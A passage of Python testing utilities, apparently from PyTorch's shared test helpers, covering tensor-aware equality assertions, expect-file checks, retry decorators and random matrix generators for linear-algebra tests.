# Tensor x np.bool
elif isinstance(x, torch.Tensor) and isinstance(y, np.bool_):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, np.bool_):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x Tensor
elif isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
debug_msg = ("Attempted to compare with different is_sparse settings: "
f"Expected: {x.is_sparse}; Actual: {y.is_sparse}.")
super().assertEqual(x.is_sparse, y.is_sparse, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
debug_msg = ("Attempted to compare with different is_quantized settings: "
f"Expected: {x.is_quantized}; Actual: {y.is_quantized}.")
super().assertEqual(x.is_quantized, y.is_quantized, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
if x.is_sparse:
if x.size() != y.size():
debug_msg_sparse = ("Attempted to compare equality of tensors with different sizes: "
f"Expected: {x.size()}; Actual: {y.size()}.")
super().assertTrue(False, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg_sparse))
x = x.coalesce()
y = y.coalesce()
indices_result, debug_msg_indices = self._compareTensors(x._indices(), y._indices(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not indices_result:
assert debug_msg_indices is not None
debug_msg = "Sparse tensor indices failed to compare as equal! " + debug_msg_indices
super().assertTrue(indices_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
values_result, debug_msg_values = self._compareTensors(x._values(), y._values(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not values_result:
assert debug_msg_values is not None
debug_msg = "Sparse tensor values failed to compare as equal! " + debug_msg_values
super().assertTrue(values_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif x.is_quantized and y.is_quantized:
self.assertEqual(x.qscheme(), y.qscheme(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
if x.qscheme() == torch.per_tensor_affine:
self.assertEqual(x.q_scale(), y.q_scale(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_zero_point(), y.q_zero_point(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif x.qscheme() == torch.per_channel_affine:
self.assertEqual(x.q_per_channel_scales(), y.q_per_channel_scales(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_per_channel_zero_points(), y.q_per_channel_zero_points(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
self.assertEqual(x.q_per_channel_axis(), y.q_per_channel_axis(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
result, debug_msg_compare = self._compareTensors(x.int_repr().to(torch.int32),
y.int_repr().to(torch.int32),
atol=atol, rtol=rtol,
exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_compare is not None
debug_msg = "Quantized representations failed to compare as equal! " + debug_msg_compare
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
result, debug_msg_generic = self._compareTensors(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_generic is not None
debug_msg = "Tensors failed to compare as equal!" + debug_msg_generic
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif isinstance(x, (np.ndarray, torch.Tensor)) or isinstance(y, (np.ndarray, torch.Tensor)):
def maybe_to_tensor(a: Union[np.ndarray, torch.Tensor]) -> Union[np.ndarray, torch.Tensor]:
if not isinstance(a, np.ndarray):
return a
try:
return torch.from_numpy(a)
except TypeError:
# This happens if the dtype is non-numeric or not supported by torch
return a
def maybe_to_list(a: Any) -> Any:
if not isinstance(a, (np.ndarray, torch.Tensor)):
return a
return a.tolist()
x = maybe_to_tensor(x)
y = maybe_to_tensor(y)
if isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
self.assertEqual(
x, y, atol=atol, rtol=rtol, msg=msg, exact_dtype=exact_dtype, exact_device=exact_device
)
else:
# In case we can't convert the array to a tensor, we fall back to comparing x and y as iterables
self.assertEqual(
maybe_to_list(x),
maybe_to_list(y),
atol=atol,
rtol=rtol,
msg=msg,
exact_dtype=exact_dtype,
exact_device=exact_device
)
elif isinstance(x, string_classes) and isinstance(y, string_classes):
debug_msg = ("Attempted to compare [string] types: "
f"Expected: {repr(x)}; Actual: {repr(y)}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif type(x) == set and type(y) == set:
debug_msg = ("Attempted to compare [set] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif self._is_dict(x) and self._is_dict(y):
if isinstance(x, OrderedDict) and isinstance(y, OrderedDict):
self.assertEqual(x.items(), y.items(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
else:
self.assertEqual(set(x.keys()), set(y.keys()), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
key_list = list(x.keys())
self.assertEqual([x[k] for k in key_list],
[y[k] for k in key_list],
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, type) and isinstance(y, type):
# See TestTorch.test_assert_equal_generic_meta
debug_msg = ("Attempted to compare [type] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif is_iterable(x) and is_iterable(y):
debug_msg = ("Attempted to compare the lengths of [iterable] types: "
f"Expected: {len(x)}; Actual: {len(y)}.")
super().assertEqual(len(x), len(y), msg=self._get_assert_msg(msg, debug_msg=debug_msg))
for x_, y_ in zip(x, y):
self.assertEqual(x_, y_, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, bool) and isinstance(y, bool):
super().assertTrue(x == y, msg=msg)
# Scalar x Scalar
elif isinstance(x, Number) and isinstance(y, Number):
result, debug_msg_scalars = self._compareScalars(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan)
if not result:
assert debug_msg_scalars is not None
debug_msg = "Scalars failed to compare as equal! " + debug_msg_scalars
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
super().assertEqual(x, y, msg=msg)
    def assertNotEqual(self, x, y, msg: Optional[str] = None, *,  # type: ignore[override]
                       atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
        # Inverse of the custom assertEqual above: succeeds iff assertEqual,
        # with the same tolerances, raises an AssertionError.
        with self.assertRaises(AssertionError, msg=msg):
            self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
# This API is used simulate deprecated x.type() == y.type()
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
raise AssertionError("object not found in iterable")
    # Reimplemented to provide special behavior when
    # _ignore_not_implemented_error is True
    def assertRaises(self, expected_exception, *args, **kwargs):
        # When _ignore_not_implemented_error is set, delegate to the custom
        # AssertRaisesContextIgnoreNotImplementedError context (defined
        # elsewhere in this module) — presumably it tolerates
        # NotImplementedError from the code under test; confirm at its
        # definition. Otherwise fall through to the stock unittest behavior.
        if self._ignore_not_implemented_error:
            context: Optional[AssertRaisesContextIgnoreNotImplementedError] = \
                AssertRaisesContextIgnoreNotImplementedError(expected_exception, self)  # type: ignore[call-arg]
            try:
                return context.handle('assertRaises', args, kwargs)  # type: ignore[union-attr]
            finally:
                # Drop the context reference to break a traceback cycle,
                # see https://bugs.python.org/issue23890
                context = None
        else:
            return super().assertRaises(expected_exception, *args, **kwargs)
    # Reimplemented to provide special behavior when
    # _ignore_not_implemented_error is True
    def assertRaisesRegex(self, expected_exception, expected_regex, *args, **kwargs):
        # Same delegation scheme as assertRaises above, with the additional
        # regex argument forwarded to the custom context.
        if self._ignore_not_implemented_error:
            context = AssertRaisesContextIgnoreNotImplementedError(  # type: ignore[call-arg]
                expected_exception, self, expected_regex)
            return context.handle('assertRaisesRegex', args, kwargs)  # type: ignore[attr-defined]
        else:
            return super().assertRaisesRegex(expected_exception, expected_regex, *args, **kwargs)
    # TODO: Support context manager interface
    # NB: The kwargs forwarding to callable robs the 'subname' parameter.
    # If you need it, manually apply your callable in a lambda instead.
    def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
        # Invoke callable(*args, **kwargs), expect it to raise exc_type, and
        # compare str(exception) against the recorded expect file (see
        # assertExpected below). Fails if nothing is raised.
        subname = None
        if 'subname' in kwargs:
            subname = kwargs['subname']
            del kwargs['subname']
        try:
            callable(*args, **kwargs)
        except exc_type as e:
            self.assertExpected(str(e), subname)
            return
        # Don't put this in the try block; the AssertionError will catch it
        self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
r"""
Test if :attr:`callable` does not raise a warning.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
callable()
self.assertTrue(len(ws) == 0, msg)
    @contextmanager
    def assertWarnsOnceRegex(self, category, regex=''):
        """Context manager for code that *must always* warn

        This filters expected warnings from the test and fails if
        the expected warning is not caught. It uses set_warn_always() to force
        TORCH_WARN_ONCE to behave like TORCH_WARN
        """
        pattern = re.compile(regex)
        with warnings.catch_warnings(record=True) as ws:
            warnings.simplefilter("always")  # allow any warning to be raised
            with set_warn_always_context(True):
                yield
        if len(ws) == 0:
            self.fail('no warning caught')
        # At least one recorded warning must be of the expected category...
        self.assertTrue(any([type(w.message) is category for w in ws]))
        # ...and at least one (of any category) must match the regex; the
        # failure message lists the messages of the expected category.
        self.assertTrue(
            any([re.match(pattern, str(w.message)) for w in ws]),
            f'{pattern}, {[w.message for w in ws if type(w.message) is category]}')
    def assertExpected(self, s, subname=None):
        r"""
        Test that a string matches the recorded contents of a file
        derived from the name of this test and subname. This file
        is placed in the 'expect' directory in the same directory
        as the test script. You can automatically update the recorded test
        output using --accept.
        If you call this multiple times in a single function, you must
        give a unique subname each time.
        """
        if not isinstance(s, str):
            raise TypeError("assertExpected is strings only")
        def remove_prefix(text, prefix):
            if text.startswith(prefix):
                return text[len(prefix):]
            return text
        # NB: we take __file__ from the module that defined the test
        # class, so we place the expect directory where the test script
        # lives, NOT where test/common_utils.py lives. This doesn't matter in
        # PyTorch where all test scripts are in the same directory as
        # test/common_utils.py, but it matters in onnx-pytorch
        module_id = self.__class__.__module__
        munged_id = remove_prefix(self.id(), module_id + ".")
        test_file = os.path.realpath(sys.modules[module_id].__file__)
        # Expect file path: <test dir>/expect/<TestClass.test_name>[-subname].expect
        expected_file = os.path.join(os.path.dirname(test_file),
                                     "expect",
                                     munged_id)
        subname_output = ""
        if subname:
            expected_file += "-" + subname
            subname_output = " ({})".format(subname)
        expected_file += ".expect"
        expected = None
        def accept_output(update_type):
            # Overwrite the expect file with the current output (--accept mode).
            print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
            with open(expected_file, 'w') as f:
                # Adjust for producer_version, leave s unmodified
                s_tag = re.sub(r'(producer_version): "[0-9.]*"',
                               r'\1: "CURRENT_VERSION"', s)
                f.write(s_tag)
        try:
            with open(expected_file) as f:
                expected = f.read()
        except IOError as e:
            # Only a missing expect file is tolerated; any other I/O error is real.
            if e.errno != errno.ENOENT:
                raise
            elif expecttest.ACCEPT:
                return accept_output("output")
            else:
                raise RuntimeError(
                    ("I got this output for {}{}:\n\n{}\n\n"
                     "No expect file exists; to accept the current output, run:\n"
                     "python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id)) from None
        # a hack for JIT tests: CppOp bodies are platform-dependent on Windows,
        # so blank them out on both sides before comparing.
        if IS_WINDOWS:
            expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
            s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
        # Adjust for producer_version
        expected = expected.replace(
            'producer_version: "CURRENT_VERSION"',
            'producer_version: "{}"'.format(torch.onnx.producer_version)
        )
        if expecttest.ACCEPT:
            if expected != s:
                return accept_output("updated output")
        else:
            if hasattr(self, "assertMultiLineEqual"):
                # Preferred: produces a readable multi-line diff on mismatch.
                # NB: Python considers lhs "old" and rhs "new".
                self.assertMultiLineEqual(expected, s)
            else:
                self.assertEqual(s, expected)
def assertExpectedStripMangled(self, s, subname=None):
s = re.sub(r'__torch__[^ ]+', '', s)
self.assertExpected(s, subname)
def assertGreaterAlmostEqual(self, first, second, places=None, msg=None, delta=None):
"""Assert that ``first`` is greater than or almost equal to ``second``.
The equality of ``first`` and ``second`` is determined in a similar way to
the ``assertAlmostEqual`` function of the standard library.
"""
if delta is not None and places is not None:
raise TypeError("specify delta or places not both")
if first >= second:
return
diff = second - first
if delta is not None:
if diff <= delta:
return
standardMsg = f"{first} not greater than or equal to {second} within {delta} delta"
else:
if places is None:
places = 7
if round(diff, places) == 0:
return
standardMsg = f"{first} not greater than or equal to {second} within {places} places"
msg = self._formatMessage(msg, standardMsg)
raise self.failureException(msg)
# run code in subprocess and capture exceptions.
@staticmethod
def run_process_no_exception(code, env=None):
import subprocess
popen = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
(stdout, stderr) = popen.communicate()
return (stdout, stderr)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
# remove IN_CI flag since this is a wrapped test process.
# IN_CI flag should be set in the parent process only.
if "IN_CI" in env.keys():
del env["IN_CI"]
(stdout, stderr) = TestCase.run_process_no_exception(code, env=env)
return stderr.decode('ascii')
def download_file(url, binary=True):
    """Fetch `url` into the local test data directory (cached across runs)
    and return the local path.  A download failure skips the test instead of
    failing it."""
    from urllib.parse import urlsplit
    from urllib import request, error
    filename = os.path.basename(urlsplit(url)[2])
    data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
    path = os.path.join(data_dir, filename)
    if os.path.exists(path):
        # Already downloaded by a previous run.
        return path
    try:
        payload = request.urlopen(url, timeout=15).read()
        mode = 'wb' if binary else 'w'
        with open(path, mode) as f:
            f.write(payload)
        return path
    except error.URLError as e:
        msg = "could not download test file '{}'".format(url)
        warnings.warn(msg, RuntimeWarning)
        raise unittest.SkipTest(msg) from e
def find_free_port():
    """
    Finds an available port and returns that port number.

    NOTE: If this function is being used to allocate a port to Store (or
    indirectly via init_process_group or init_rpc), it should be used
    in conjunction with the `retry_on_connect_failures` decorator as there is
    a potential race condition where the allocated port may become unavailable
    before it can be used.
    """
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind(('localhost', 0))
        # getsockname() -> (host, port); the OS picked the port for us.
        return sock.getsockname()[1]
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."

def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE,)):
    """Reruns a test if the test returns a RuntimeError and the exception
    matches exactly with one of the strings in connect_errors.

    NOTE: `connect_errors` must be a tuple of strings.  The previous default,
    `(ADDRESS_IN_USE)`, was a plain string, which turned the membership test
    below into a substring check instead of the documented exact match.
    """
    # This if block is executed when using this function as a decorator with arguments.
    if func is None:
        return partial(retry_on_connect_failures, connect_errors=connect_errors)
    @wraps(func)
    def wrapper(*args, **kwargs):
        # Up to 10 attempts, sleeping a short random interval between them.
        tries_remaining = 10
        while True:
            try:
                return func(*args, **kwargs)
            except RuntimeError as error:
                if str(error) in connect_errors:
                    tries_remaining -= 1
                    if tries_remaining == 0:
                        raise
                    time.sleep(random.random())
                    continue
                # Not a known connect failure: propagate immediately.
                raise
    return wrapper
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
    """Retry decorator: re-invoke `f` up to `tries` times on ExceptionToCheck,
    sleeping `delay` seconds between attempts.

    If the final attempt also fails:
      * skip_after_retries=True  -> raise unittest.SkipTest chained to the error
      * skip_after_retries=False -> let the original exception propagate
    """
    def deco_retry(f):
        @wraps(f)
        def f_retry(*args, **kwargs):
            mtries, mdelay = tries, delay
            while mtries > 1:
                try:
                    return f(*args, **kwargs)
                except ExceptionToCheck as e:
                    msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
                    print(msg)
                    time.sleep(mdelay)
                    mtries -= 1
            # Final attempt. BUGFIX: the old
            #   raise unittest.SkipTest(...) from e if skip_after_retries else e
            # parsed the conditional as the chained *cause* only, so SkipTest
            # was always raised regardless of skip_after_retries.
            try:
                return f(*args, **kwargs)
            except ExceptionToCheck as e:
                if skip_after_retries:
                    raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e
                raise
        return f_retry  # true decorator
    return deco_retry
# Methods for matrix generation
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
    """Return a random l x l matrix with rank exactly `rank`.

    Built by taking the SVD of a Gaussian matrix, zeroing the trailing
    singular values and bumping any accidental zero among the kept ones
    up to 1, then recomposing.
    """
    assert rank <= l
    gaussian = torch.randn(l, l, dtype=dtype, device=device)
    u, s, vh = torch.linalg.svd(gaussian, full_matrices=False)
    s[rank:] = 0
    kept = s[:rank]
    kept[kept == 0] = 1
    return (u * s.to(dtype).unsqueeze(-2)) @ vh
def random_well_conditioned_matrix(*shape, dtype, device, mean=1.0, sigma=0.001):
    """
    Returns a random rectangular matrix (batch of matrices)
    with singular values sampled from a Gaussian with
    mean `mean` and standard deviation `sigma`.

    The smaller the `sigma`, the better conditioned
    the output matrix is.
    """
    # Real dtype to sample the spectrum in (singular values are real even for
    # complex matrices).
    primitive_dtype = {
        torch.float: torch.float,
        torch.double: torch.double,
        torch.cfloat: torch.float,
        torch.cdouble: torch.double
    }
    base = torch.rand(shape, dtype=dtype, device=device)
    rows, cols = base.size(-2), base.size(-1)
    u, _, vh = torch.linalg.svd(base, full_matrices=False)
    k = min(rows, cols)
    # Spectrum ~ N(mean, sigma), sorted descending per batch entry.
    spectrum = torch.randn(*(shape[:-2] + (k,)), dtype=primitive_dtype[dtype], device=device)
    spectrum = (spectrum * sigma + mean).sort(-1, descending=True).values.to(dtype)
    return (u * spectrum.unsqueeze(-2)) @ vh
# Returns a noncontiguous tensor with the same shape and values as t
# The noncontiguous tensor is constructed such that elements in the innermost
# dimension are separated by zeros or (whenever possible) nans
# TODO: consider more complicated noncontiguity schemes
def noncontiguous_like(t):
    """Return a tensor with the same shape and values as `t` but backed by
    noncontiguous storage: each element is interleaved with a padding slot
    (nan where representable, else 0) that the returned view strides over."""
    # Short-circuits if t is already noncontiguous
    if not t.is_contiguous():
        return t
    # Special-cases 0-dim tensors
    if t.ndim == 0:
        # Duplicate the scalar, poison slot 0, then view only slot 1 by
        # setting a storage offset of 1 with an empty stride tuple.
        result = t.detach().unsqueeze(0).repeat_interleave(2, dim=-1)
        if t.dtype.is_floating_point or t.dtype.is_complex:
            result[0] = math.nan
        else:
            result[0] = 0
        result.set_(result.storage(), 1, t.size(), ())
        result.requires_grad_(t.requires_grad)
        return result
    # 1+ dim tensor case
    # Duplicate every element along the innermost dim and poison the copies...
    result = torch.repeat_interleave(t.detach(), 2, dim=-1)
    if t.dtype.is_floating_point or t.dtype.is_complex:
        result[..., 1::2] = math.nan
    else:
        result[..., 1::2] = 0
    # ...then double the innermost stride so the view skips the poisoned slots.
    strides = list(result.stride())
    strides[-1] = strides[-1] * 2
    result.set_(result.storage(), result.storage_offset(), t.size(), stride=tuple(strides))
    result.requires_grad_(t.requires_grad)
    return result
# TODO: remove this (prefer make_symmetric_matrices below)
def random_symmetric_matrix(l, *batches, **kwargs):
    """Random symmetric l x l matrix (or batch), symmetrized as (G + G^T)/2."""
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    gaussian = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
    return (gaussian + gaussian.mT).div_(2)
# Creates a symmetric matrix or batch of symmetric matrices
# Shape must be a square matrix or batch of square matrices
def make_symmetric_matrices(*shape, device, dtype):
    assert shape[-1] == shape[-2]
    raw = make_tensor(shape, device=device, dtype=dtype)
    # Symmetrize: (T + T^T) / 2.
    return (raw + raw.mT).div_(2)
def random_hermitian_matrix(l, *batches, **kwargs):
    """Random Hermitian l x l matrix (or batch), built as (G + G^H)/2."""
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    gaussian = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
    return (gaussian + gaussian.mH).div_(2)
def random_symmetric_psd_matrix(l, *batches, **kwargs):
    """
    Returns a batch of random symmetric positive-semi-definite matrices.
    The shape of the result is batch_dims + (matrix_size, matrix_size)

    The following example creates a tensor of size 2 x 4 x 3 x 3
    >>> matrices = random_symmetric_psd_matrix(3, 2, 4, dtype=dtype, device=device)
    """
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    gaussian = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
    # G @ G^T is symmetric PSD by construction.
    return torch.matmul(gaussian, gaussian.mT)
def random_hermitian_psd_matrix(matrix_size, *batch_dims, dtype=torch.double, device='cpu'):
    """
    Returns a batch of random Hermitian positive-semi-definite matrices.
    The shape of the result is batch_dims + (matrix_size, matrix_size)

    The following example creates a tensor of size 2 x 4 x 3 x 3
    >>> matrices = random_hermitian_psd_matrix(3, 2, 4, dtype=dtype, device=device)
    """
    gaussian = torch.randn(*(batch_dims + (matrix_size, matrix_size)), dtype=dtype, device=device)
    # G @ G^H is Hermitian PSD by construction.
    return torch.matmul(gaussian, gaussian.mH)
# TODO: remove this (prefer make_symmetric_pd_matrices below)
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
    """Random symmetric positive-definite matrix (or batch); strict PD is
    ensured by adding a small multiple of the identity to G @ G^T."""
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    gaussian = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
                           dtype=dtype, device=device)
    eye = torch.eye(matrix_size, dtype=dtype, device=device)
    return gaussian @ gaussian.mT + eye * 1e-5
# Creates a symmetric positive-definite matrix or batch of
# such matrices
def make_symmetric_pd_matrices(*shape, device, dtype):
    assert shape[-1] == shape[-2]
    raw = make_tensor(shape, device=device, dtype=dtype)
    # The small diagonal shift guarantees strict positive definiteness.
    jitter = torch.eye(shape[-1], device=device, dtype=dtype) * 1e-5
    return raw @ raw.mT + jitter
def random_hermitian_pd_matrix(matrix_size, *batch_dims, dtype, device):
    """
    Returns a batch of random Hermitian positive-definite matrices.
    The shape of the result is batch_dims + (matrix_size, matrix_size)

    The following example creates a tensor of size 2 x 4 x 3 x 3
    >>> matrices = random_hermitian_pd_matrix(3, 2, 4, dtype=dtype, device=device)
    """
    gaussian = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
                           dtype=dtype, device=device)
    # G @ G^H is PSD; adding the identity makes it strictly PD.
    return gaussian @ gaussian.mH + torch.eye(matrix_size, dtype=dtype, device=device)
# TODO: remove this (prefer make_fullrank_matrices_with_distinct_singular_values below)
def random_fullrank_matrix_distinct_singular_value(matrix_size, *batch_dims,
                                                   **kwargs):
    """Random full-rank square matrix (or batch) whose singular values are
    the distinct values i/(matrix_size+1), i = 1..matrix_size."""
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    silent = kwargs.get("silent", False)
    if silent and not torch._C.has_lapack:
        # Degenerate fallback for builds without LAPACK support.
        return torch.ones(matrix_size, matrix_size, dtype=dtype, device=device)
    gaussian = torch.randn(batch_dims + (matrix_size, matrix_size), dtype=dtype, device=device)
    u, _, vh = torch.linalg.svd(gaussian, full_matrices=False)
    real_dtype = gaussian.real.dtype if gaussian.dtype.is_complex else gaussian.dtype
    s = torch.arange(1., matrix_size + 1, dtype=real_dtype, device=device).mul_(1.0 / (matrix_size + 1))
    return (u * s.to(gaussian.dtype)) @ vh
# Creates a full rank matrix with distinct singular values or
# a batch of such matrices
# Shape must be a square matrix or batch of square matrices
def make_fullrank_matrices_with_distinct_singular_values(*shape, device, dtype):
    assert shape[-1] == shape[-2]
    base = make_tensor(shape, device=device, dtype=dtype)
    u, _, vh = torch.linalg.svd(base, full_matrices=False)
    # TODO: improve the handling of complex tensors here
    real_dtype = base.real.dtype if base.dtype.is_complex else base.dtype
    # Distinct spectrum i/(n+1), i = 1..n, applied to the orthonormal factors.
    s = torch.arange(1., shape[-1] + 1, dtype=real_dtype, device=device).mul_(1.0 / (shape[-1] + 1))
    return (u * s.to(dtype)) @ vh
def random_matrix(rows, columns, *batch_dims, **kwargs):
    """Return rectangular matrix or batches of rectangular matrices.

    Parameters:
      dtype - the data type
      device - the device kind
      singular - when True, the output will be singular
    """
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    silent = kwargs.get("silent", False)
    singular = kwargs.get("singular", False)
    if silent and not torch._C.has_lapack:
        return torch.ones(rows, columns, dtype=dtype, device=device)
    gaussian = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
    u, _, vh = torch.linalg.svd(gaussian, full_matrices=False)
    k = min(rows, columns)
    # Fixed, well-spread spectrum in (0, 1].
    s = torch.linspace(1 / (k + 1), 1, k, dtype=dtype, device=device)
    if singular:
        # Zero the smallest singular value; for k > 2 also the largest so LU
        # pivoting is exercised non-trivially.
        s[k - 1] = 0
        if k > 2:
            s[0] = 0
    return (u * s.unsqueeze(-2)) @ vh
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
    """Return rectangular matrix or batches of rectangular matrices with
    given rank.
    """
    # rank(left @ right) == rank since both factors have full rank `rank`.
    left = random_matrix(rows, rank, *batch_dims, **kwargs)
    right = random_matrix(rank, columns, *batch_dims, **kwargs)
    return left @ right
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
    """Return rectangular random sparse matrix within given density.

    The density of the result approaches to given density as the size
    of the matrix is increased and a relatively small value of density
    is specified but higher than min(rows, columns)/(rows * columns)
    for non-singular matrices.

    Keyword args: dtype (default torch.double), device (default 'cpu').
    (Removed dead code: an unused `singular` kwarg read and a local `k`
    that shadowed a recomputed min(rows, columns).)
    """
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    # At least min(rows, columns) entries so every row/column can be touched.
    k = min(rows, columns)
    nonzero_elements = max(k, int(rows * columns * density))
    row_indices = [i % rows for i in range(nonzero_elements)]
    column_indices = [i % columns for i in range(nonzero_elements)]
    random.shuffle(column_indices)
    indices = [row_indices, column_indices]
    values = torch.randn(nonzero_elements, dtype=dtype, device=device)
    # ensure that the diagonal dominates
    values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
    indices_tensor = torch.tensor(indices)
    A = torch.sparse_coo_tensor(indices_tensor, values, (rows, columns), device=device)
    return A.coalesce()
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
    """Return random sparse positive-definite matrix with given density.

    The eigenvalues of the matrix are defined as::
        arange(1, matrix_size+1)/matrix_size

    Algorithm:
      A = diag(arange(1, matrix_size+1)/matrix_size)
      while <A density is smaller than required>:
          <choose random i, j in range(matrix_size), theta in [0, 2*pi]>
          R = <rotation matrix (i,j,theta)>
          A = R^T A R
    """
    import math
    # NOTE(review): this allows a stand-in `torch` module to be injected via
    # kwargs, defaulting to the real torch from this module's globals.
    torch = kwargs.get('torch', globals()['torch'])
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    # Sparse dict-of-keys representation {(row, col): value}, seeded with the
    # diagonal entries (i+1)/matrix_size — these are the final eigenvalues,
    # since rotations preserve the spectrum.
    data = dict([((i, i), float(i + 1) / matrix_size)
                 for i in range(matrix_size)])
    def multiply(data, N, i, j, cs, sn, left=True):
        # Apply a plane rotation (cosine cs, sine sn) mixing index pair (i, j)
        # into the dict-of-keys matrix in place.  left=True updates column
        # pairs ((k,i),(k,j)); left=False updates row pairs ((i,k),(j,k)).
        for k in range(N):
            if left:
                ik, jk = (k, i), (k, j)
            else:
                ik, jk = (i, k), (j, k)
            aik, ajk = data.get(ik, 0), data.get(jk, 0)
            aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
            # Keep only nonzero entries so the representation stays sparse.
            if aik:
                data[ik] = aik
            else:
                data.pop(ik, None)
            if ajk:
                data[jk] = ajk
            else:
                data.pop(jk, None)
    # Apply random rotations from both sides until the requested nonzero
    # count is reached.
    target_nnz = density * matrix_size * matrix_size
    while len(data) < target_nnz:
        i = random.randint(0, matrix_size - 1)
        j = random.randint(0, matrix_size - 1)
        if i != j:
            theta = random.uniform(0, 2 * math.pi)
            cs = math.cos(theta)
            sn = math.sin(theta)
            multiply(data, matrix_size, i, j, cs, sn, left=True)
            multiply(data, matrix_size, i, j, cs, sn, left=False)
    # Convert the dict-of-keys form to COO coordinates/values.
    icoords, jcoords, values = [], [], []
    for (i, j), v in sorted(data.items()):
